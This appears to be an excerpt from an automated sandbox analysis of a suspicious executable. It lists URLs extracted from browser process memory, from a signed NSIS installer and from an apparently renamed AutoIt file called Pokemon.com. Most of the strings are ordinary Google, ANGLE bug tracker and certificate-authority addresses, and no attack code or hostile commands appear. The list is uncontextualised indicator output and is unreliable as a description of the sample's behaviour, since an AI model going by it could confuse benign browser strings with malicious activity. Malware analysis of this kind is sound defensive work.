                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/703603
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553X
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760Wa
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229V
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: JA7cOAGHym.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: JA7cOAGHym.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: JA7cOAGHym.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: JA7cOAGHym.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: chrome.exe, 00000010.00000002.2704703981.00007C1C0008F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714428198.00007C1C00DEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: JA7cOAGHym.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: JA7cOAGHym.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: JA7cOAGHym.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: JA7cOAGHym.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: chrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chrome.exe, 00000010.00000002.2712107078.00007C1C00AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edg
                Source: chrome.exe, 00000010.00000002.2714560428.00007C1C00E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                Source: chrome.exe, 00000010.00000002.2712107078.00007C1C00AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgl/
                Source: chrome.exe, 00000010.00000002.2711111299.00007C1C009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                Source: JA7cOAGHym.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: JA7cOAGHym.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                Source: Pokemon.com, 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp, Investigator.9.dr, Pokemon.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: chrome.exe, 00000010.00000002.2712107078.00007C1C00AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.
                Source: chrome.exe, 00000010.00000002.2711269920.00007C1C009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                Source: chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, WLFCTJ.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000002.2704703981.00007C1C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                Source: chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                Source: chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                Source: chrome.exe, 00000010.00000002.2704839811.00007C1C000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                Source: chrome.exe, 00000010.00000002.2704839811.00007C1C000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                Source: chrome.exe, 00000010.00000002.2704839811.00007C1C000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                Source: chrome.exe, 00000010.00000002.2704703981.00007C1C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
